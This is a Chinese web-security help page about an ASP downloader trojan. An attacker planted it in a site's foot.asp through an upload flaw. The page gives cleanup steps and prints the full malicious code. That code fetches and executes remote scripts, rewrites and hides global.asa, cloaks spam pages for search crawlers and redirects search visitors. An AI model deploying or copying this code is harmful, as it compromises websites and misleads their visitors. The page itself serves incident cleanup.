最近客户的多个页面中了远程加载一些代码的页面,主要是利用MSXML2.serverXMLHTTP来加载一些代码并执行,下面是具体的解决方法。
解决办法:
1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:http://www.lovean.com/softs/12771.html
2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:

3、关闭服务器上的缩略图功能 方法参考 http://www.lovean.com/os/windows/Win2003/34960.html
根源:
这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码:

 
<%
'by*aming
Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>

清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!

xmlasaquan.txt的内容如下:

 
'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.1.2('3:4');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClientConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
response.redirect("http://www.82767.com/?"&cnnbd&"")
'Response.Write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
response.end
else
asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
Call sleep()
end if
end if
'</body></html>
最新资讯
苹果回应iTunes内容意外消失问题:可能是切换区域

苹果回应iTunes内容意

有用户表示,苹果不声不响就删除了他iTunes帐户中已购买
郭明錤:Apple Watch 4预订超预期 iPhone XS需求低迷

郭明錤:Apple Watch 4

郭明錤预测,2018年Apple Watch的出货量将达到1800万台,
离开华为三年,我才真正认同狼性文化

离开华为三年,我才真正

正如直到今天,我才真正理解、并从心底认同了华为狼性文
新蛋赴美上市,电商老大哥的血泪失败史

新蛋赴美上市,电商老大

美蛋飞跃,中蛋附庸。
苹果创新力被指枯竭 双卡双待能否挽回颓势?

苹果创新力被指枯竭

增速放缓、被指造假、iPhone X从官网下架……创新力略
各大手机厂商陷入混战 “苹果神话”还能再现吗?

各大手机厂商陷入混战

市场从来不缺弄潮者,然而谁又能真正地走出“模仿”的怪
最新文章
电脑磁碟机病毒如何彻底查杀?如何规避电脑磁碟机病毒?

电脑磁碟机病毒如何彻

磁碟机木马最近成为安全领域的热门话题,“磁碟机”木
四招让你的电脑裸奔也不会中毒

四招让你的电脑裸奔也

大家都知道在自己的电脑上必须安装一个杀毒软件,这样使
U盘Ripper病毒无法删除的解决方法

U盘Ripper病毒无法删

昨天我发现的这个毒,用的是Nod32,不过清除不了,便写了这
ESET不能卸载怎么办?

ESET不能卸载怎么办?

为什么我的ESET卸载不干净,安装卡巴时提示,下面教你手动
1KB文件夹快捷方式病毒清除软件

1KB文件夹快捷方式病

1KB文件夹快捷方式病毒清除专用附件包含三部分。
 彻底消灭gggdu.com修复IE无法搜索的问题

彻底消灭gggdu.com修

突然发现IE7的搜索框不能用了,以为是IE出了问题,几次修